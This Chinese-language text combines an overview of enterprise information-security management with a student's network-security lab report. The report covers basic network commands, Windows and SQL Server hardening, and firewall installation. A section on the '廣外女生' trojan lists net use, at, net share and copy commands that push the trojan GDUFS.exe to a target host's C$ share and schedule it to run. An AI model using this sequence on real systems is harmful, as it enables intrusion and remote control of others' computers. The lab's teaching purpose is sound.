由于網(wǎng)上的安全產(chǎn)品較多，且分布在不同的位置，這就需要建立一套集中管理的機(jī)制和設(shè)備，即安全管理中心。它用來(lái)給各網(wǎng)絡(luò)安全設(shè)備分發(fā)密鑰，監(jiān)控網(wǎng)絡(luò)安全設(shè)備的運(yùn)行狀態(tài)，負(fù)責(zé)收集網(wǎng)絡(luò)安全設(shè)備的審計(jì)信息等。

入侵檢測(cè)系統(tǒng)（IDS）

入侵檢測(cè)，作為傳統(tǒng)保護(hù)機(jī)制（比如訪問(wèn)控制，身份識(shí)別等）的有效補(bǔ)充，形成了信息系統(tǒng)中不可或缺的反饋鏈。

入侵防御系統(tǒng)（IPS）

入侵防御，入侵防御系統(tǒng)作為IDS很好的補(bǔ)充，是信息安全發(fā)展過(guò)程中占據(jù)重要位置的計(jì)算機(jī)網(wǎng)絡(luò)硬件。

安全數(shù)據(jù)庫(kù)

由于大量的信息存儲(chǔ)在計(jì)算機(jī)數(shù)據(jù)庫(kù)內(nèi)，有些信息是有價(jià)值的，也是敏感的，需要保護(hù)。安全數(shù)據(jù)庫(kù)可以確保數(shù)據(jù)庫(kù)的完整性、可靠性、有效性、機(jī)密性、可審計(jì)性及存取控制與用戶身份識(shí)別等。

數(shù)據(jù)容災(zāi)設(shè)備

數(shù)據(jù)容災(zāi)作為一個(gè)重要的企業(yè)信息安全管理體系中的一個(gè)重要補(bǔ)救措施，在整個(gè)企業(yè)信息安全管理體系中有著舉足輕重的作用。數(shù)據(jù)容災(zāi)設(shè)備包括數(shù)據(jù)恢復(fù)設(shè)備、數(shù)據(jù)復(fù)制設(shè)備、數(shù)據(jù)銷毀設(shè)備等。目前應(yīng)用較多的數(shù)據(jù)容災(zāi)設(shè)備包括效率源HD Doctor、Data Compass數(shù)據(jù)指南針、Data Copy King硬盤復(fù)制機(jī)、開盤機(jī)等。

編輯本段企業(yè)信息安全管理對(duì)策 1.網(wǎng)絡(luò)管理

一般企業(yè)網(wǎng)與互聯(lián)網(wǎng)物理隔離, 因而與互聯(lián)網(wǎng)相比, 其安全性較高, 但在日常運(yùn)行管理中我們?nèi)匀幻媾R網(wǎng)絡(luò)鏈路維護(hù)、違規(guī)使用網(wǎng)絡(luò)事件等問(wèn)題, 具體而言：

(1)在IP 資源管理方面, 采用IP MAC 捆綁的技術(shù)手段防止用戶隨意更改IP 地址和隨意更換交換機(jī)上的端口。這分兩種情況實(shí)現(xiàn), 第一種情況是如果客戶機(jī)連在支持網(wǎng)管的交換機(jī)上的, 可以通過(guò)網(wǎng)管中心的管理軟件, 對(duì)該交換機(jī)遠(yuǎn)程實(shí)施Port Security 策略, 將客戶端網(wǎng)卡MAC 地址固定綁在相應(yīng)端口上。第二種情況是如果客戶機(jī)連接的交換機(jī)或集線器不支持網(wǎng)管, 則可以通過(guò)Web 網(wǎng)頁(yè)調(diào)用一個(gè)程序, 通過(guò)該程序把MAC 地址和IP 地址捆綁在一起。這樣, 就不會(huì)出現(xiàn)IP 地址被盜用而不能正常使用網(wǎng)絡(luò)的情況。

(2)在網(wǎng)絡(luò)流量監(jiān)測(cè)方面, 可使用網(wǎng)絡(luò)監(jiān)測(cè)軟件對(duì)網(wǎng)絡(luò)傳輸數(shù)據(jù)協(xié)議類型進(jìn)行分類統(tǒng)計(jì), 查看數(shù)據(jù)、視頻、語(yǔ)音等各種應(yīng)用的利用帶寬, 防止頻繁進(jìn)行大文件的傳輸, 甚至發(fā)現(xiàn)病毒的轉(zhuǎn)移及傳播方向。

2.服務(wù)器管理

常見應(yīng)用服務(wù)器安裝的操作系統(tǒng)多為Windows 系列,服務(wù)器的管理包括服務(wù)器安全審核、組策略實(shí)施、服務(wù)器的備份策略。服務(wù)器安全審核是網(wǎng)管日常工作項(xiàng)目之一, 審核的范圍包括安全漏洞檢查、日志分析、補(bǔ)丁安裝情況檢查等, 審核的對(duì)象可以是DC、Exchange Server、SQL Server、IIS 等。

在組策略實(shí)施時(shí), 如果想使用軟件限制策略, 即哪些客戶不能使用哪個(gè)軟件, 則需要把操作系統(tǒng)升級(jí)到Windows 2003 Server。服務(wù)器的備份策略包括系統(tǒng)軟件備份和數(shù)據(jù)庫(kù)備份兩部分, 系統(tǒng)軟件備份擬利用現(xiàn)有的專用備份程序, 制定一個(gè)合理的備份策略, 如每周日晚上做一次完全備份, 然后周一到周五晚上做增量備份或差額備份;定期對(duì)服務(wù)器備份工作情況等。

3.客戶端管理

對(duì)大多數(shù)單位的網(wǎng)管來(lái)說(shuō), 客戶端的管理都是最頭痛的問(wèn)題, 只有得力的措施才能解決這個(gè)問(wèn)題, 這里介紹以下幾種方法:

1)將客戶端都加入到域中, 這一點(diǎn)很重要, 因?yàn)橹挥羞@樣, 客戶端才能納入管理員集中管理的范圍。

2)只給用戶以普通域用戶的身份登錄到域, 因?yàn)槠胀ㄓ蛴脩舨粚儆诒镜谹dministrators 和Power Users 組, 這樣就可以限制他們?cè)诒镜赜?jì)算機(jī)上安裝大多數(shù)軟件(某些軟件普通用戶也可以安裝)。當(dāng)然為了便于用戶工作, 應(yīng)通過(guò)本地安全策略, 授予他們“關(guān)機(jī)”和“修改系統(tǒng)時(shí)間”等權(quán)利。

3)實(shí)現(xiàn)客戶端操作系統(tǒng)補(bǔ)丁程序的自動(dòng)安裝。4)實(shí)現(xiàn)客戶端防病毒軟件的自動(dòng)更新。

5)利用SMS 對(duì)客戶端進(jìn)行不定期監(jiān)控, 發(fā)現(xiàn)不正常情況及時(shí)處理。

4.數(shù)據(jù)備份與數(shù)據(jù)加密

由于應(yīng)用系統(tǒng)的加入, 各種數(shù)據(jù)庫(kù)日趨增長(zhǎng), 如何確保數(shù)據(jù)在發(fā)生故障或?yàn)?zāi)難性事件情況下不丟失, 是當(dāng)前面臨的一個(gè)難題。這里介紹四種解決方法: 第一種解決辦法是用磁帶機(jī)或硬盤進(jìn)行數(shù)據(jù)備份。該辦法價(jià)格最低, 保存性最強(qiáng), 不足之處是備份的只是某個(gè)時(shí)間點(diǎn)。第二種方案是采用本地磁盤陣列來(lái)分別實(shí)現(xiàn)各服務(wù)器的本地硬盤數(shù)據(jù)冗余。第三種方案是采用雙機(jī)容錯(cuò)方式, 兩臺(tái)機(jī)器系統(tǒng)相互備份, 應(yīng)用層數(shù)據(jù)全部放在共享的磁盤陣列柜中, 這種方式能解決單機(jī)故障或宕機(jī)的問(wèn)題, 同時(shí)又能防止單個(gè)硬盤故障導(dǎo)致的數(shù)據(jù)丟失, 但前期投資較大。第四種方案是采用NAS 或SAN 來(lái)實(shí)現(xiàn)各服務(wù)器的集中區(qū)域存儲(chǔ), 實(shí)現(xiàn)較高級(jí)別的磁盤等硬件故障的數(shù)據(jù)備份, 但是成本較高, 一般不能防止系統(tǒng)層的故障, 如感染病毒或系統(tǒng)崩潰?？紤]到網(wǎng)絡(luò)上非認(rèn)證用戶可能試圖旁路系統(tǒng)的情況, 如物理地“取走”數(shù)據(jù)庫(kù), 在通信線路上竊聽截獲。對(duì)這樣的威脅最有效的解決方法就是數(shù)據(jù)加密, 即以加密格式存儲(chǔ)和傳輸敏感數(shù)據(jù)。發(fā)送方用加密密鑰, 通過(guò)加密設(shè)備或算法, 將信息加密后發(fā)送出去。接收方在收到密文后, 用解密密鑰將密文解密, 恢復(fù)為明文。如果傳輸中有人竊取,他只能得到無(wú)法理解的密文, 從而對(duì)信息起到保密作用。

5.病毒防治

對(duì)防病毒軟件的要求是: 能支持多種平臺(tái), 至少是在Windows 系列操作系統(tǒng)上都能運(yùn)行;能提供中心管理工具, 對(duì)各類服務(wù)器和工作站統(tǒng)一管理和控制;在軟件安裝、病毒代碼升級(jí)等方面, 可通過(guò)服務(wù)器直接進(jìn)行分發(fā), 盡可能減少客戶端維護(hù)工作量;病毒代碼的升級(jí)要迅速有效。在實(shí)施過(guò)程中, 本單位以一臺(tái)服務(wù)器作為中央控制一級(jí)服務(wù)器, 實(shí)現(xiàn)對(duì)網(wǎng)絡(luò)中所有計(jì)算機(jī)的保護(hù)和監(jiān)控, 并使用其中有效的管理功能, 如: 管理員可以向客產(chǎn)端發(fā)送病毒警報(bào)、強(qiáng)制對(duì)遠(yuǎn)程客戶端進(jìn)行病毒掃描、鎖定遠(yuǎn)程客產(chǎn)端等。正常情況下, 一級(jí)服務(wù)器病毒代碼庫(kù)升級(jí)后半分鐘內(nèi), 客戶端的病毒代碼庫(kù)也進(jìn)行了同步更新。

四、企業(yè)網(wǎng)絡(luò)、信息安全解決方案 1）大型企業(yè)

大型企業(yè)部門林立，相當(dāng)一部分會(huì)在外地有分支機(jī)構(gòu)，業(yè)務(wù)系統(tǒng)普遍采用建設(shè)虛擬專網(wǎng)的方式，起到外部分支訪問(wèn)總部數(shù)據(jù)的通道和安全加密作用。傳統(tǒng)的網(wǎng)絡(luò)安全設(shè)備基本都已經(jīng)部署，比如防火墻，可以把企業(yè)訪問(wèn)互聯(lián)網(wǎng)的風(fēng)險(xiǎn)降低，但是大型企業(yè)的網(wǎng)絡(luò)、信息安全威脅主要來(lái)源于惡意的攻擊行為和企業(yè)員工有意、無(wú)意的操作行為，致使業(yè)務(wù)系統(tǒng)不能正常使用，或者機(jī)密數(shù)據(jù)外泄，對(duì)企業(yè)的網(wǎng)絡(luò)安全，信息保密造成很大的威脅，擁有功能強(qiáng)大的上網(wǎng)行為管理設(shè)備、入侵檢測(cè)系統(tǒng)和防泄密系統(tǒng)能有效杜絕各個(gè)環(huán)節(jié)可能出現(xiàn)的不安全隱患，保障業(yè)務(wù)系統(tǒng)的政策正常安全運(yùn)行和企業(yè)機(jī)密數(shù)據(jù)的安全。

建議大型企業(yè)在網(wǎng)絡(luò)中部署：防火墻、IDS、上網(wǎng)行為管理、防泄密系統(tǒng)、VPN、安全服務(wù)器等。

2）中型企業(yè)

中型企業(yè)基本已具備完整的網(wǎng)絡(luò)體系，但是企業(yè)的信息化技術(shù)力量相對(duì)大型企業(yè)可能薄弱一點(diǎn)，對(duì)于員工的上網(wǎng)行為和電腦操作行為可能要求得不會(huì)太嚴(yán)格，即使向員工制定了一定的管理制度，也會(huì)在制度的執(zhí)行過(guò)程中因?yàn)槿藶榈囊蛩囟兂梢患埧瘴?，所以用硬件設(shè)備來(lái)保障和規(guī)范網(wǎng)絡(luò)、信息的安全尤為重要，中型企業(yè)的網(wǎng)絡(luò)、信息安全威脅主要來(lái)源于外網(wǎng)的攻擊、內(nèi)部網(wǎng)絡(luò)使用的不規(guī)范導(dǎo)致的木馬、病毒等安全威脅。

建議中型企業(yè)部署：防火墻、IDS、路由器、上網(wǎng)行為管理、防泄密系統(tǒng)等。

3）小型企業(yè)

小型企業(yè)在人員規(guī)模、基礎(chǔ)建設(shè)、資金實(shí)力等方面都相對(duì)落后于大中型企業(yè)，但是在發(fā)展階段的小型企業(yè)，對(duì)網(wǎng)絡(luò)、信息的安全問(wèn)題同樣不能忽視，目前各式各樣的聊天工具、視頻網(wǎng)站、網(wǎng)游、P2P下載等，都會(huì)直接影響到員工的工作效率，并且占用了大部分的帶寬，使得業(yè)務(wù)系統(tǒng)和正常的工作無(wú)法得到保障，且小型企業(yè)一般不會(huì)配置專業(yè)的網(wǎng)管人員，這就是有的小型企業(yè)配置了好的電腦，夠用的寬帶，但是仍然有大部分員工一直抱怨總是不能上網(wǎng)，或者上網(wǎng)太慢，郵件發(fā)不出去等問(wèn)題。從綜合實(shí)力來(lái)講，小型企業(yè)在網(wǎng)絡(luò)、信息安全方面的投入會(huì)比較有限，建議企業(yè)配置中低端的安全設(shè)備，防火墻，上網(wǎng)行為管理，以研發(fā)和設(shè)計(jì)為主的企業(yè)對(duì)于防泄密系統(tǒng)的部署還是有必要的。

第五篇：【企業(yè)網(wǎng)絡(luò)】網(wǎng)絡(luò)信息安全報(bào)告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡(luò)信息安全報(bào)告

一、實(shí)驗(yàn)?zāi)康募耙?/p>

該專周的目標(biāo)是讓學(xué)生掌握網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。以及了解計(jì)算機(jī)網(wǎng)絡(luò)安全方面的管理、配置和維護(hù)。

本課程要求在理論教學(xué)上以必需夠用為原則，應(yīng)盡量避免過(guò)深過(guò)繁的理論探討，重在理解網(wǎng)絡(luò)安全的基本框架，網(wǎng)絡(luò)安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測(cè)技術(shù)以及學(xué)習(xí)網(wǎng)絡(luò)病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡(luò)安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學(xué)生對(duì)計(jì)算機(jī)的使用有一定了解（了解Windows的使用，具有鍵盤操作和文件處理的基礎(chǔ)），并已經(jīng)掌握計(jì)算機(jī)網(wǎng)絡(luò)的基本原理。

二、專周內(nèi)容

1、安全需求分析

（1）網(wǎng)絡(luò)安全問(wèn)題主要集中在對(duì)服務(wù)器的安全保護(hù)、防黑客和病毒、重要網(wǎng)段的保護(hù)及管理安全上。因此，我們必須采取相應(yīng)的安全措施杜絕安全隱患，其中應(yīng)該做到：

A、公開服務(wù)器的安全保護(hù) B、防止黑客從外部攻擊 C、入侵檢測(cè)與監(jiān)控 D、病毒防護(hù) E、數(shù)據(jù)安全保護(hù) F、網(wǎng)絡(luò)的安全管理

（2）解決網(wǎng)絡(luò)安全問(wèn)題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點(diǎn)是可用性和可控性）；

B、保持網(wǎng)絡(luò)原有的特點(diǎn)，即對(duì)網(wǎng)絡(luò)的協(xié)議和傳輸具有良好的透明性，能透明接入，無(wú)需更改網(wǎng)絡(luò)設(shè)置；

C、易于操作、維護(hù)，并便于自動(dòng)化管理，而不增加或少增加附加操作；

D、盡量不影響原網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)，同時(shí)便于系統(tǒng)及系統(tǒng)功能的擴(kuò)展；

E、安全保密系統(tǒng)具有較好的性能價(jià)格比。一次性投資，可以長(zhǎng)期使用；

F、安全產(chǎn)品具有合法性，及經(jīng)過(guò)國(guó)家有關(guān)管理部門的認(rèn)可或認(rèn)證；

（3）系統(tǒng)安全目標(biāo)

A、建立一套完整可行的網(wǎng)絡(luò)安全與網(wǎng)絡(luò)管理策略；

B、將內(nèi)部網(wǎng)絡(luò)、公開服務(wù)器網(wǎng)絡(luò)和外網(wǎng)進(jìn)行有效隔離，避免與外部網(wǎng)絡(luò)直接通信；

C、建立網(wǎng)站各主機(jī)和服務(wù)器的安全保護(hù)措施，保證他們的系統(tǒng)安全；

D、加強(qiáng)合法用戶的訪問(wèn)認(rèn)證，同時(shí)將用戶的訪問(wèn)權(quán)限控制在最低限度；

E、全面監(jiān)視對(duì)公開服務(wù)器的訪問(wèn)，及時(shí)發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強(qiáng)對(duì)各種訪問(wèn)的審計(jì)工作，詳細(xì)記錄對(duì)網(wǎng)絡(luò)、公開服務(wù)器的訪問(wèn)行為，形成完整的系統(tǒng)日志；

2、網(wǎng)絡(luò)拓?fù)?/p>

3、網(wǎng)絡(luò)安全的基本內(nèi)容

（1）基本網(wǎng)絡(luò)命令

A、ping命令： ping –t IP，向指定的計(jì)算機(jī)不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計(jì)信息并繼續(xù)運(yùn)行，按 Ctr+C可中止運(yùn)行。

B、Tracert命令：tracert IP 顯示從本地計(jì)算機(jī)到目標(biāo)服務(wù)器所經(jīng)過(guò)的計(jì)算機(jī)：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計(jì)算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務(wù)組件

開始——程序——管理工具——服務(wù) 出現(xiàn)以下窗口：

然后在該對(duì)話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時(shí)將“啟動(dòng)類型”設(shè)置為“手動(dòng)”或“已禁用”，這樣就可以對(duì)指定的服務(wù)組進(jìn)行屏蔽了。B、關(guān)閉默認(rèn)共享：“開始”——“程序”——“管理工具”——“服務(wù)”——“Server”

（3）數(shù)據(jù)庫(kù)系統(tǒng)安全

A、使用安全的帳號(hào)策略和Windows認(rèn)證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個(gè)超級(jí)用戶，所以，我們必須對(duì)這個(gè)帳號(hào)進(jìn)行最強(qiáng)的保護(hù)，當(dāng)然，包括使用一個(gè)非常強(qiáng)壯的密碼，最好不要在數(shù)據(jù)庫(kù)應(yīng)用中使用sa帳號(hào)，只有當(dāng)沒(méi)有其它方法登錄到 SQL Server 實(shí)例(例如，當(dāng)其它系統(tǒng)管理員不可用或忘記了密碼)時(shí)才使用 sa。可以新建立一個(gè)擁有與sa一樣權(quán)限的超級(jí)用戶來(lái)管理數(shù)據(jù)庫(kù)。安全的帳號(hào)策略還包括不要讓管理員權(quán)限的帳號(hào)泛濫。

SQL Server的認(rèn)證模式有Windows身份認(rèn)證和混合身份認(rèn)證兩種。在任何可能的時(shí)候，應(yīng)該對(duì)指向SQL Server的連接要求Windows身份驗(yàn)證模式。

Windows認(rèn)證模式比混合模式更優(yōu)越，原因在以下：

1)它通過(guò)限制對(duì)Microsoft Windows用戶和域用戶帳戶的連接，保護(hù)SQL Server免受大部分Internet工具的侵害。

2)服務(wù)器將從Windows安全增強(qiáng)機(jī)制中獲益，例如更強(qiáng)的身份驗(yàn)證協(xié)議以及強(qiáng)制的密碼復(fù)雜性和過(guò)期時(shí)間。

3)使用Windows認(rèn)證，不需要將密碼存放在連接字符串中。存儲(chǔ)密碼是使用標(biāo)準(zhǔn)SQL Server登錄的應(yīng)用程序的主要漏洞之一。

4)Windows認(rèn)證意味著你只需要將密碼存放在一個(gè)地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗(yàn)證模式，步驟操作： 展開服務(wù)器組——右鍵點(diǎn)擊服務(wù)器——然后點(diǎn)擊“屬性”——在安全性選項(xiàng)卡的身份驗(yàn)證中——點(diǎn)擊“僅限Windows”。（4）網(wǎng)絡(luò)防火墻工具：紅墻主機(jī)網(wǎng)絡(luò)防火墻 安裝

1.具體操作如下：

第一步： 將“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”的安裝光盤插入驅(qū)動(dòng)器，運(yùn)行根目錄下的Setup文件來(lái)運(yùn)行其安裝程序，進(jìn)入“愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻安裝”窗口；

第二步：

在“歡迎安裝愛思紅墻主機(jī)網(wǎng)絡(luò)防火墻”對(duì)話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對(duì)話框，接受協(xié)議點(diǎn)擊“是”；

第四步： 點(diǎn)擊“是”按鈕，出現(xiàn)顯示您計(jì)算機(jī)的相關(guān)信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標(biāo)位置”對(duì)話框；

第六步： 在該對(duì)話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對(duì)話框中選擇盤符作為驅(qū)動(dòng)器，再指定相應(yīng)的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對(duì)話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開始復(fù)制文件；

第九步： 進(jìn)入“紅墻主機(jī)網(wǎng)絡(luò)防火墻配置”窗口，作出是否運(yùn)行“紅墻應(yīng)用程序掃描系統(tǒng)”的選擇后，點(diǎn)擊“完成”。

相關(guān)設(shè)置：告警設(shè)置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據(jù)需要選取告警設(shè)置。

點(diǎn)擊主界面中的“規(guī)則管理”按鈕，彈出相應(yīng)窗口，如下圖：

網(wǎng)絡(luò)監(jiān)控中心：

（5）網(wǎng)絡(luò)攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設(shè)置屬性，建立文件夾和運(yùn)行指定文件等功能；注冊(cè)表操作方面：全面模擬WINDOWS的注冊(cè)表編輯器，讓遠(yuǎn)程注冊(cè)表編輯工作有如在本機(jī)上操作一樣方便；屏幕控制方面：可以自定義圖片的質(zhì)量來(lái)減少傳輸?shù)臅r(shí)間，在局域網(wǎng)或高網(wǎng)速的地方還可以全屏操作對(duì)方的鼠標(biāo)及鍵盤，就像操縱自己的計(jì)算機(jī)一樣；遠(yuǎn)程任務(wù)管理方面，可以直觀地瀏覽對(duì)方窗體，隨意殺掉對(duì)方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運(yùn)行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務(wù)端設(shè)置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復(fù)制到自己的C盤中，再根據(jù)一些命令把“GDUFS.exe”復(fù)制到目標(biāo)主機(jī)的盤中，再進(jìn)行運(yùn)行。目標(biāo)主機(jī)的IP：191.168.12.38 具體步驟及命令：

“開始”——“運(yùn)行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標(biāo)主機(jī)之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標(biāo)主機(jī)的時(shí)間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標(biāo)主機(jī)的C盤建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復(fù)制“GDUFS.exe”文件到目標(biāo)主機(jī)的C盤中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標(biāo)主機(jī)中什么時(shí)候運(yùn)行。

三、專周小結(jié)：

通過(guò)這次網(wǎng)絡(luò)安全專周，我不僅僅是學(xué)到了很多知識(shí)，更是透徹的理解到了網(wǎng)絡(luò)安全對(duì)生活已經(jīng)將來(lái)工作的意義。

網(wǎng)絡(luò)安全分為軟件網(wǎng)絡(luò)安全和硬件網(wǎng)絡(luò)安全。一般我們說(shuō)的網(wǎng)絡(luò)安全就是軟件上的網(wǎng)絡(luò)安全，即局域網(wǎng)，互聯(lián)網(wǎng)安全。

網(wǎng)絡(luò)安全又分為內(nèi)網(wǎng)安全和外網(wǎng)安全。在內(nèi)外網(wǎng)安全中，內(nèi)網(wǎng)安全則是重中之重。畢竟是家賊難防。據(jù)不完全統(tǒng)計(jì)，全國(guó)因?yàn)閮?nèi)網(wǎng)安全的問(wèn)題，至少每年算是幾億美元。所以，網(wǎng)絡(luò)安全特別重要。

至于在將來(lái)的工作中，我們也要嚴(yán)格尊市網(wǎng)絡(luò)設(shè)備管理原則和使用秩序，對(duì)設(shè)備進(jìn)行統(tǒng)一管理專人負(fù)責(zé)，嚴(yán)格要求自己對(duì)設(shè)備進(jìn)行安全操作，保持強(qiáng)烈的責(zé)任感和服務(wù)意識(shí)，做好每一個(gè)細(xì)節(jié)，重點(diǎn)做好以下幾項(xiàng)工作：

1，及時(shí)準(zhǔn)確判斷網(wǎng)絡(luò)故障，做好上門維護(hù)工作或及時(shí)提醒網(wǎng)絡(luò)合作商進(jìn)行維護(hù)。

2，定期檢查維護(hù)各網(wǎng)絡(luò)設(shè)備的運(yùn)行情況并進(jìn)行維護(hù)。3，不定期對(duì)服務(wù)器進(jìn)行更新和檢查。

4，遇到特殊情況，及時(shí)向領(lǐng)導(dǎo)和老師匯報(bào)，努力提高應(yīng)急處理問(wèn)題和獨(dú)立處理問(wèn)題的能力。

感謝老師對(duì)我們的教導(dǎo)。